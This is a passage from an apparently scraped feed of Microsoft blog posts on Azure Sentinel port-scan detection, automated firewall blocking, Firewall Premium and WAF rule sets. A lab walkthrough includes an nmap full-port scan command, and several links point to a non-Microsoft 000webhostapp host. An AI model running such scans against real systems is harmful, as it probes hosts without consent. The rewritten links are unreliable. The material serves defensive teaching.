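// Port sweep: one source, one port, many destinations.
let PortSweep = Parsed
    | summarize DistinctCount = dcount(DestinationIP),
                Denied = countif(Action == "Deny"),
                Examples = make_set(DestinationIP, 10)
        by SourceIP, Target = tostring(DestinationPort), bin(TimeGenerated, TimeWindow)
    | where DistinctCount >= HostThreshold
    | extend Finding = "Port sweep";
union PortScan, PortSweep
| project TimeGenerated, Finding, SourceIP, Target, DistinctCount, Denied, Examples
| order by TimeGenerated asc
```

<P>The Denied column separates a source that is being stopped by firewall rules from one whose probes are getting through, which is usually the first triage question for either finding.</P>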
<H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Firewall Workbook</H3> <P>&nbsp;</P> <P>Use the following instructions to launch and configure the Azure Firewall Workbook deployed by the solution.<BR /><BR /></P> <OL> <LI>Browse over to the Azure Sentinel blade</LI> <LI>In the left pane, click on the <STRONG>Workbooks </STRONG>node</LI> <LI>In the Workbooks blade, click on <STRONG>My workbooks </STRONG>tab</LI> <LI>Click to select the “Azure Firewall” workbook in the <STRONG>My workbooks </STRONG>blade</LI> <LI>In the right pane (Customer defined workbook), click <STRONG>View saved workbook </STRONG>button</LI> </OL> <P>&nbsp;</P> <P>You can now select the appropriate timeframe and firewalls to visualize the logs in the different tabs of the Workbook.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Reference</STRONG>: </FONT><EM><A href="#" target="_blank" rel="noopener"><FONT size="2">Visualize your data using Azure Monitor Workbooks in Azure Sentinel | Microsoft Docs</FONT></A></EM></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Hunting Queries</H3> <P>&nbsp;</P> <P>Use the following instructions to run the Azure Firewall Hunting Queries deployed by the solution.</P> <P>&nbsp;</P> <OL> <LI>Browse over to the Azure Sentinel blade</LI> <LI>In the left pane, click on the <STRONG>Hunting </STRONG>node</LI> <LI>In the Hunting blade, click the checkbox to select one or multiple queries deployed by the solution <UL> <LI>If you have many preexisting queries, click the <STRONG>Add filter</STRONG> button and then filter on <STRONG>Provider = Custom Queries</STRONG></LI> </UL> </LI> <LI>Click the <STRONG>Run selected queries </STRONG>button on the top to run</LI> <LI>You will see the results of the query in <STRONG>Results </STRONG>column of the queries</LI> </OL> <P>&nbsp;</P> <P>To see detailed results of a query run, click to select the query and click the <STRONG>View results </STRONG>button in the right pane.&nbsp; This will open the Log Analytics workspace where you can modify the query to 
drill deeper into the logs.&nbsp; The query logic can be modified and saved for future use.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Reference</STRONG>: </FONT><A href="#" target="_blank" rel="noopener"><EM><FONT size="2">Hunting capabilities in Azure Sentinel | Microsoft Docs</FONT></EM></A></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Analytic Rules</H3> <P>&nbsp;</P> <P>Use the following instructions to enable and configure the Analytic Rule based detections deployed by the solution.</P> <P>&nbsp;</P> <OL> <LI>Browse over to the Azure Sentinel blade</LI> <LI>In the left pane, click on the <STRONG>Analytics </STRONG>node</LI> <LI>In the Analytics blade, click the checkbox to select one or multiple detection rules deployed by the solution and click the <STRONG>Enable </STRONG>button to enable the detection rule(s) <UL> <LI>Detection rules deployed by the solution are disabled by default</LI> </UL> </LI> <LI>To update the detection logic or the trigger threshold, click to select a detection rule and then click <STRONG>Edit</STRONG> in the right pane</LI> <LI>The detection logic can be modified in the <STRONG>Set rule logic</STRONG> tab and saved for future use</LI> </OL> <P>&nbsp;</P> <P>Now that the solution has been deployed and all components have been enabled/configured successfully, you can use the Firewall Workbook to visualize the Azure Firewall log data, use Hunting queries to identify uncommon/anomalous patterns and create incidents with the enabled detection rules.&nbsp; You can also automate response for any Azure Firewall detections using the available Azure Sentinel Playbooks.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Reference</STRONG>: </FONT><EM><A href="#" target="_blank" rel="noopener"><FONT size="2">Detect threats with built-in analytics rules in Azure Sentinel | Microsoft Docs</FONT></A></EM></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Testing Detection Rule with Playbook for Automated Response (includes Demo)</H2> <P>&nbsp;</P> <P>In this 
section, we will use an example scenario to walk you through the steps involved in configuring and testing one of the detections included in the Azure Firewall Solution and responding to it by making the desired update to the Azure Firewall configuration automatically, with one of the Playbooks also included in the solution.&nbsp; As a learning aid, a <STRONG>prerecorded end-to-end demonstration for the scenario is also available at the end of this section</STRONG>.&nbsp; The instructions preceding the demo video are to assist you in setting up and configuring your environment so you can follow along and perform testing based on the scenario outlined below.&nbsp; We encourage you to follow the step-by-step process in this section to gain familiarity with key concepts and configuration requirements.</P> <P>&nbsp;</P> <P>In the following Example Scenario, you will use the <STRONG>Port Scan</STRONG> rule provided in the solution to detect scanning activity and respond to it automatically using the <STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG> Playbook.&nbsp; In this scenario, upon successful detection of a port scan, an incident will be created in Azure Sentinel.&nbsp; The Playbook will be triggered by the Azure Sentinel Automation Rule which will allow you to add the IP address of the port scanner (source host) to an IP Group used in a deny network rule on Azure Firewall to block traffic from the port scanner.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Example Scenario</H3> <P>&nbsp;</P> <P>To test the Port Scan detection and automated response capability, you will need a test environment with:</P> <P>&nbsp;</P> <OL> <LI>2 Virtual Machines in separate Spoke VNETs in Azure</LI> <LI>A Hub VNET with Azure Firewall Standard or Premium which has <UL> <LI>An Allow Network rule to allow all traffic between the 2 Spoke VNETs</LI> <LI>A Deny Network rule collection with a Network rule which uses IP Group as the source</LI> </UL> </LI> <LI>Ensure that the 2 VMs 
in Spoke VNETs communicate with each other through the Azure Firewall <UL> <LI>This can be accomplished by peering the 2 Spoke VNETs where the VMs live with the Hub VNET with Azure Firewall</LI> <LI>User Defined Routes (UDRs) on the Spoke Subnets to ensure that all traffic from the VMs is routed through the Azure Firewall</LI> </UL> </LI> <LI>Azure Sentinel workspace with Azure Firewall Solution deployed and Azure Firewall Connector and Playbooks configured correctly</LI> </OL> <P>&nbsp;</P> <P>Here is a diagram of an example setup.&nbsp; We will be using this setup as reference for the remainder of this document.<BR /><BR /></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1629999089802.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306066iA4B98BFC0BCE1034/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1629999089802.png" alt="Mohit_Kumar_0-1629999089802.png" /></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Configuration Requirements in Example Scenario</H3> <P>&nbsp;</P> <P>Before you can begin testing, please follow the instructions below to ensure Azure Firewall, Azure Firewall Connector and Playbooks (automation) and Azure Sentinel are ready:</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H4>Azure Firewall</H4> <P>&nbsp;</P> <P>Please ensure that your Azure Firewall has the following configurations:</P> <P>&nbsp;</P> <OL> <LI>An existing <STRONG>IP Group</STRONG> which will contain IP addresses to be blocked by Azure Firewall</LI> <LI>An existing <STRONG>Deny Network Rule Collection</STRONG> which is processed before other Allow Network Rule Collections</LI> <LI>An existing <STRONG>Network Rule</STRONG> in the Deny Network Rule Collection which uses the IP Group from Step 1 for Source</LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <H4>Azure Firewall Connector and Playbooks</H4> <P>&nbsp;</P> <P>Please ensure that the Azure 
Firewall Custom Logic App Connector and Playbooks Templates are configured correctly as described in the detailed step-by-step guide available here <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener">Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks</A><SPAN>.</SPAN></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H4>Azure Sentinel</H4> <P>&nbsp;</P> <P>Please follow the instructions below to configure the Port Scan detection rule and create an automation rule in Azure Sentinel.&nbsp;</P> <P>&nbsp;</P> <OL> <LI>Click to select the <STRONG>Port Scan</STRONG> rule and then click the <STRONG>Edit </STRONG>button</LI> <LI>Click the <STRONG>Next: Set rule logic </STRONG>button in the <STRONG>General tab</STRONG></LI> <LI>Edit the port scan detection logic in the <STRONG>Rule query</STRONG> pane</LI> <LI>By default, this rule looks for port scan attempts made 24 hours ago.&nbsp; To immediately see detection and automated response for a port scan you will be simulating, modify the rule by commenting out the following line in the query<BR /><BR /><LI-CODE lang="json">//| where TimeGenerated between (ago(StartRunTime) .. ago(EndRunTime))</LI-CODE> <P>&nbsp;</P> <BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1629995083899.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306039i92663C2FF001696A/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1629995083899.png" alt="Mohit_Kumar_3-1629995083899.png" /></span></LI> </OL> <P>&nbsp;</P> <OL start="5"> <LI>Click on the <STRONG>Next: Incident settings </STRONG>button</LI> <LI>In the <STRONG>Incident settings</STRONG> tab, click on the <STRONG>Next: Automated response </STRONG>button</LI> <LI>In the <STRONG>Automated response </STRONG>tab, create a new <STRONG>Automation Rule</STRONG> and attach it to the <STRONG>Port Scan </STRONG>detection rule<BR /> <OL class="lia-list-style-type-lower-alpha"> <LI>Click the <STRONG>Add new </STRONG>button in the <STRONG>Incident automation </STRONG>pane</LI> <LI>Add a name for the rule in the <STRONG>Automation rule name </STRONG>field</LI> <LI>Ensure that the <STRONG>Trigger </STRONG>is set to <EM>When incident is created</EM></LI> <LI>In <STRONG>Conditions</STRONG>, click to select <STRONG>If Analytic rule name</STRONG> <EM>contains</EM> <EM>Port Scan</EM> or <EM>Current rule</EM></LI> <LI>Under <STRONG>Actions</STRONG>, select <EM>Run playbook </EM>from the drop-down menu</LI> <LI>Select the <STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG> Playbook from the second drop-down under <STRONG>Actions</STRONG></LI> <LI>Select an appropriate date/time in <STRONG>Rule expiration</STRONG></LI> <LI>Click on the <STRONG>Apply </STRONG>button to create the Automation Rule</LI> </OL> </LI> <LI>Click on the <STRONG>Next: Review</STRONG> button in the <STRONG>Automated Response</STRONG> tab</LI> <LI>Click on the <STRONG>Save</STRONG> button in the <STRONG>Review and create </STRONG>tab to finish rule configuration</LI> </OL> <P>&nbsp;</P> <P>Please see the screen capture below for a 
step-by-step process to modify the Port Scan detection rule and create an Automation rule in Azure Sentinel.<BR /><BR /></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ConfigureDetectionandAutomationRule-RAW-Edited2-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306062iD47D187AD5CCBB52/image-size/large?v=v2&amp;px=999" role="button" title="ConfigureDetectionandAutomationRule-RAW-Edited2-Final.gif" alt="Modifying the Port Scan Detection Rule and creating an Automation Rule" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Modifying the Port Scan Detection Rule and creating an Automation Rule</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Testing Automated Detection and Response in Example Scenario</H3> <P>&nbsp;</P> <P>In the example test setup depicted above, we have a Hub VNET with an Azure Firewall and 2 Spoke VNETs: a Client Spoke which has a Kali Linux VM and a Server Spoke which has a Windows Server 2019 VM.&nbsp; The 2 Spoke VNETs do not have direct connectivity with each other; however, both are peered with the Hub VNET and point to Azure Firewall for internet and VNET to VNET connectivity with a UDR (User Defined Route).&nbsp; Azure Firewall has a Network Rule to allow all traffic from the Client Spoke VNET to the Server Spoke VNET.&nbsp; We have 2 Network rules in Azure Firewall:<BR /><BR /></P> <UL> <LI>A lower priority rule allows all traffic (all ports and protocols) between the Client and Server Spokes</LI> <LI>A higher priority rule denies all traffic from the IP Group used as the source<BR /><BR /><STRONG>Note</STRONG>: <EM>A higher priority rule is processed before a lower priority rule in Azure Firewall<BR /><BR /></EM></LI> </UL> <P>We have deployed the Azure Firewall Solution to the Azure Sentinel Workspace and configured the Azure Firewall Connector + Playbooks in this environment.&nbsp; As 
described in the previous section (Configuration Requirements in Example Scenario), we have enabled and configured the Port Scan detection rule along with an Automation Rule to trigger the AzureFirewall-BlockIP-addToIPGroup Playbook.&nbsp; To start the automated detection and response process, we initiate a port scan from the Kali Linux VM in the Client Spoke VNET to the Windows 2019 VM in the Server Spoke VNET using the following command: <STRONG>nmap -Pn -p 1-65535 -v &lt;IP address of the Windows Server 2019 VM&gt;</STRONG>&nbsp;</P> <P>&nbsp;</P> <P>Please review the following section to understand all the steps in the automated detection and response flow.</P> <H2><STRONG>&nbsp;</STRONG></H2> <P>&nbsp;</P> <H3>How Automated Detection and Response Worked in Example Scenario</H3> <P><STRONG>&nbsp;</STRONG></P> <P>The diagram below depicts the end-to-end process starting from the time a port scan is initiated, the Azure Firewall Playbook is triggered based on the detection rule and the IP Group used in the Deny Network Rule in Azure Firewall is updated with the IP address of the port scanner (Kali VM).&nbsp; All the steps are called out in the diagram and explained below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_5-1629995230036.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306044i2A62AFAA379D6B63/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_5-1629995230036.png" alt="Mohit_Kumar_5-1629995230036.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <OL> <LI>Port scan is initiated from the Kali Linux VM in the Client Spoke to the Windows Server 2019 VM in the Server Spoke</LI> <LI>The traffic is routed through the Hub VNET where Azure Firewall processes and allows the traffic based on the Network Rule definition</LI> <LI>Port scan traffic from the Kali Linux VM in the Client Spoke 
reaches the Windows Server 2019 VM in the Server Spoke</LI> <LI>Azure Firewall logs traffic details to the Log Analytics workspace in the Network Rule Log</LI> <LI>Azure Firewall log data is ingested by Azure Sentinel using the Azure Firewall Data Connector<BR /> <UL> <LI>The Port Scan detection rule in Azure Sentinel analyzes the log data for patterns representing port scan activity</LI> <LI>When the traffic pattern in the log matches port scan activity, an Azure Sentinel Incident is created</LI> <LI>The automation rule attached to the Port Scan detection rule triggers the AzureFirewall-BlockIP-addToIPGroup Playbook</LI> </UL> </LI> <LI>The AzureFirewall-BlockIP-addToIPGroup Playbook sends an adaptive notification in the Microsoft Teams Channel defined in its configuration</LI> <LI>The analyst triaging the incident notification decides to act by adding the IP address of the port scanner host (Kali VM) identified in the notification to the IP Group used in the deny rule on Azure Firewall<BR /> <UL> <LI>The Playbook updates the Azure Sentinel Incident with details of the action taken</LI> </UL> </LI> <LI>The Playbook sends the action taken by the analyst to the Azure Firewall Connector</LI> <LI>The Firewall Connector updates the Azure Firewall configuration by adding the IP address of the port scanner to the IP Group used in the Deny Network rule</LI> </OL> <P>&nbsp;</P> <P>Please watch the prerecorded demo below, which shows how to simulate a port scan and walks you through the automated detection and response process in our example scenario.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Demo</H2> <P>&nbsp;</P> <P>In this video, we go over the demo environment setup and the configuration of Azure Firewall and Azure Sentinel in the demo environment, and provide an end-to-end demonstration of triggering the automated detection and response process described in the previous section.<BR /><BR /></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><LI-VIDEO 
vid="https://www.youtube.com/watch?v=6INoWbm6UYs" align="center" size="medium" width="400" height="225" uploading="false" thumbnail="https://i.ytimg.com/vi/6INoWbm6UYs/hqdefault.jpg" external="url"></LI-VIDEO></H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Summary</H2> <P>&nbsp;</P> <P>The Azure Firewall Solution provides net new detections, hunting queries, workbook and response automation which allow you to detect prevalent techniques used by attackers and malware.&nbsp; The Solution provides a streamlined method to deploy all packaged components at once with minimal overhead and start utilizing them in your environment.&nbsp; We encourage all customers to utilize these new detection and automation capabilities to help improve your overall security posture.</P> <P>&nbsp;</P> <P>We will continue to enhance the firewall solution in the future with new detection and automation capabilities to meet your needs.&nbsp; You can also contribute new connectors, playbooks, detections, workbooks, analytics and more for Azure Firewall in Azure Sentinel. 
&nbsp;Get started now by joining the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Network Security</A>&nbsp;plus&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters</A>&nbsp;communities on GitHub and following the guidance.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Additional Resources</H2> <P>&nbsp;</P> <UL> <LI>To learn more about Azure Firewall, visit:&nbsp;&nbsp;<A href="#" target="_blank" rel="noopener">https://aka.ms/AzNetSecNinja</A></LI> <LI>To learn more about Azure Sentinel, visit:&nbsp;&nbsp;<A href="#" target="_blank" rel="noopener">http://aka.ms/ninjatraining</A></LI> <LI>To learn more about Automation Rules and Playbooks, visit: <UL> <LI><A href="#" target="_blank" rel="noopener">Automate incident handling in Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Automate threat response with playbooks in Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Tutorial: Use playbooks with automation rules in Azure Sentinel</A></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Tue, 07 Sep 2021 19:05:47 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746 Mohit_Kumar 2021-09-07T19:05:47Z Azure Firewall Premium now in General Availability https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-premium-now-in-general-availability/ba-p/2633409 <P>Azure Firewall premium is now generally available for <A href="#" target="_blank" rel="noopener">most Azure regions</A>. Thank you to community members who participated in both the private and public previews. This SKU is compatible in a Virtual WAN Hub (Secure Virtual Hub), and Hub Virtual Network scenarios.</P> <P>The Azure Firewall Premium SKU utilizes a more powerful compute engine for advanced content filtering and threat protection through IDPS. 
The Premium SKU can seamlessly scale up to 30 Gbps and integrates with availability zones to support the service level agreement (SLA) of 99.99 percent.&nbsp;</P> <P>It provides <A href="#" target="_self">Threat intelligence-based filtering</A> for both encrypted and non-encrypted traffic and Intrusion detection and prevention for all ports and protocols as a managed service to our customers, with support for hybrid connectivity through deployment behind VPN and ExpressRoute Gateways.</P> <P>&nbsp;</P> <P>All new <A href="#" target="_self">features of the Firewall premium</A> SKU will be configurable via <A href="#" target="_self">Firewall Policy</A> only. Azure firewall infrastructure features ported from Azure Firewall Standard and Classic rules such as Threat Intelligence and Custom DNS, including new features such as TLS inspection and Web categories etc. can all be managed via Azure Firewall premium policy SKU.</P> <P>The Premium SKU complies with Payment Card Industry Data Security Standard (PCI DSS) environment needs and is ICSA labs certified.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-300px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="tobiotolorin_0-1628620276262.png" style="width: 436px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/302216i1FDD71E741B7C068/image-dimensions/436x391?v=v2" width="436" height="391" role="button" title="tobiotolorin_0-1628620276262.png" alt="tobiotolorin_0-1628620276262.png" /></span></P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <OL> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>Transport Layer Security (TLS) Inspection</EM></STRONG></A><EM>: Azure Firewall Premium decrypts outbound East-West TLS connections</EM><EM>, performs the required value-added security functions and re-encrypts the traffic which is sent to the original destination.</EM></LI> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>Intrusion Detection 
and Prevention System (IDPS)</EM></STRONG></A><STRONG><EM>:</EM></STRONG><EM> Azure Firewall Premium provides signature-based IDPS to allow rapid detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware.</EM></LI> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>Web Categories</EM></STRONG></A><EM>: Lets administrators allow or deny user access to the Internet based on categories (e.g., social networking, search engines, gambling), reducing the time spent on managing individual FQDNs and URLs. This capability is also available for Azure Firewall Standard based on FQDNs only.</EM></LI> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>URL Filtering</EM></STRONG></A><EM>: TLS inspection enables filtering beyond the FQDN root domain and allows users to access specific URLs for both plain text and encrypted traffic, typically being used in conjunction with web categories.</EM></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">By using Firewall Policy, you can achieve central management of your firewalls using Azure Firewall Manager. Firewall Rules (Classic) continues to be supported and can be used for configuring existing features of Standard Firewall. 
Firewall Policy can be managed independently or by using Azure Firewall Manager.</P> <P class="lia-indent-padding-left-270px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobiotolorin_0-1628621692989.png" style="width: 619px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/302222i1EC4C93583DA3B77/image-dimensions/619x407?v=v2" width="619" height="407" role="button" title="tobiotolorin_0-1628621692989.png" alt="tobiotolorin_0-1628621692989.png" /></span></P> <P><STRONG><EM>Migrating to the new Firewall Premium SKU</EM></STRONG><BR />To migrate your existing Azure Firewall Standard policy to a Premium policy, you connect to your Azure account, retrieve the existing policy and modify the parameters by adding the features required for a premium firewall policy to the existing firewall policy image. The existing firewall instance is then deleted as you create a new one with the premium features. &nbsp;The new instance is compute intensive due to the TLS inspection and IDPS actions, hence the Azure Firewall Premium SKU is deployed with a more powerful compute engine.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json"># $Policy is the existing Standard policy retrieved earlier;
# GetPolicyNewName is a helper from the migration guide's script (not shown here)
$NewPolicyParameters = @{
    Name              = (GetPolicyNewName -Policy $Policy)
    ResourceGroupName = $Policy.ResourceGroupName
    Location          = $Policy.Location
    ThreatIntelMode   = $Policy.ThreatIntelMode
    BasePolicy        = $Policy.BasePolicy
    DnsSetting        = $Policy.DnsSettings
    Tag               = $Policy.Tag
    SkuTier           = "Premium"   # the new policy is created on the Premium tier
}
</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>You can follow the detailed step-by-step guide in <A href="#" target="_blank" rel="noopener">Azure Firewall Premium migration.</A> Once deployed, you can test and <A href="#" target="_blank" rel="noopener">validate the different Premium features</A><SPAN>.</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Some helpful use case scenarios and reference architectures for Azure Firewall Premium:</P> <P><EM>* <A 
href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/how-to-use-azure-firewall-premium-with-wvd/ba-p/2148402" target="_blank" rel="noopener">How to use Azure Firewall Premium with WVD</A></EM></P> <P><EM>* <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763" target="_blank" rel="noopener">Certificate Management for Azure Firewall Premium TLS Inspection</A></EM></P> <P><EM>* <A href="#" target="_blank" rel="noopener">Deep dive video on Azure Firewall Standard and Premium SKU</A></EM></P> <P><EM>* <A href="#" target="_self">Azure Firewall Monitor Workbook with Premium feature logs.</A></EM></P> <P><EM>* <A href="#" target="_blank" rel="noopener">Getting started with Azure Firewall Manager</A></EM></P> <P><EM>* <A href="#" target="_blank" rel="noopener">Content Inspection Using TLS Termination with Azure Firewall Premium</A></EM></P> <P>&nbsp;</P> <P>For more information, see the&nbsp;<A href="#" target="_blank" rel="noopener"><EM>Azure Firewall Premium documentation</EM></A></P> <P>&nbsp;</P> Wed, 18 Aug 2021 15:12:48 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-premium-now-in-general-availability/ba-p/2633409 tobiotolorin 2021-08-18T15:12:48Z New Managed Rule Set on Azure WAF for Front Door Premium https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-managed-rule-set-on-azure-waf-for-front-door-premium/ba-p/2628959 <P><FONT size="4">A new managed rule set called&nbsp;<EM><STRONG>Microsoft_DefaultRuleSet_2.0</STRONG></EM>&nbsp;has been launched in public preview on Azure Web Application Firewall (WAF)&nbsp;for&nbsp;Front Door Premium.&nbsp;To simplify, we often refer&nbsp;to this rule set as&nbsp;<EM><STRONG>DRS 2.0</STRONG></EM>.&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="4">The new managed rule set&nbsp;offers&nbsp;enhanced rule definitions to&nbsp;help reduce false 
positives,&nbsp;additional&nbsp;managed rules to detect and protect against&nbsp;more&nbsp;web application attacks, anomaly scoring mode and&nbsp;support for&nbsp;additional&nbsp;content-types.&nbsp;</FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-360px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_0-1628536692380.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301876iC6F68FB3FB522B8E/image-size/medium?v=v2&amp;px=400" role="button" title="camilamartins_0-1628536692380.png" alt="camilamartins_0-1628536692380.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>What are the requirements to use&nbsp;DRS 2.0?&nbsp;</STRONG></FONT></P> <P><FONT size="4">You must be using Azure&nbsp;Front Door Premium SKU*.&nbsp;&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="2" color="#333333"><EM>*Note:&nbsp;Azure Front Door Premium&nbsp;(which includes DRS 2.0) is currently in Public Preview status. We do not recommend using&nbsp;this&nbsp;version&nbsp;on production workloads until it becomes Generally Available (GA). This is a great time to invest in a proof of concept or testing, though.</EM></FONT></P> <P>&nbsp;</P> <P><STRONG><FONT size="4">What&nbsp;changes when&nbsp;using&nbsp;DRS 2.0?&nbsp;</FONT></STRONG></P> <P><FONT size="4">DRS 2.0 introduces updated rule definitions, Microsoft Threat Intelligence rules, anomaly scoring mode, and additional content-type support. 
</FONT></P> <P>&nbsp;</P> <P><FONT size="4">Let's talk a little more about each one of these items:</FONT></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#0000FF"><STRONG><FONT size="4">Updated&nbsp;Rule Definitions&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">Our managed rules that protect against the most common&nbsp;web application attacks, such as the OWASP Top 10, are based on&nbsp;OWASP&nbsp;ModSecurity&nbsp;Core Rule Set&nbsp;(CRS). In DRS&nbsp;2.0, the definitions were updated based on version CRS 3.2.&nbsp;&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">CRS 3.2 has several improvements in comparison to the previous CRS versions. Multiple security rules have received fixes that help lower the occurrence of false positives, and new security rules have been added to detect and protect against more threats, such&nbsp;as&nbsp;new&nbsp;types of&nbsp;Cross-Site Scripting (XSS)&nbsp;and&nbsp;SQL Injection (SQLi)&nbsp;attacks. 
</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">For more detailed information on what changed from CRS 3.1 to CRS 3.2, you can refer to the&nbsp;<A href="#" target="_blank" rel="noopener">OWASP ModSecurity Core Rule Set Version 3.2.0 change log</A>.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_1-1628536692409.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301878iC13DDC5B4943CE85/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_1-1628536692409.png" alt="camilamartins_1-1628536692409.png" /></span></FONT></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><BR /><FONT color="#0000FF"><STRONG><FONT size="4">Microsoft Threat Intelligence Rules&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">We have added our own Microsoft-authored security rules. 
These rules were created&nbsp;by&nbsp;the&nbsp;Microsoft Threat Intelligence Center (MSTIC)&nbsp;team based on signatures developed internally and are not open-sourced.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_2-1628536692436.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301877i2E06C7C469AFBD43/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_2-1628536692436.png" alt="camilamartins_2-1628536692436.png" /></span></FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#0000FF"><STRONG><FONT size="4">Anomaly Scoring Mode&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">Previous versions of the managed rule sets in Azure WAF for&nbsp;Front Door&nbsp;follow the “Traditional&nbsp;Mode” for threat response. This means that&nbsp;as soon as an HTTP request matches a rule,&nbsp;the WAF takes the configured action&nbsp;(allow, block, log, or redirect)&nbsp;and no further rules are processed. 
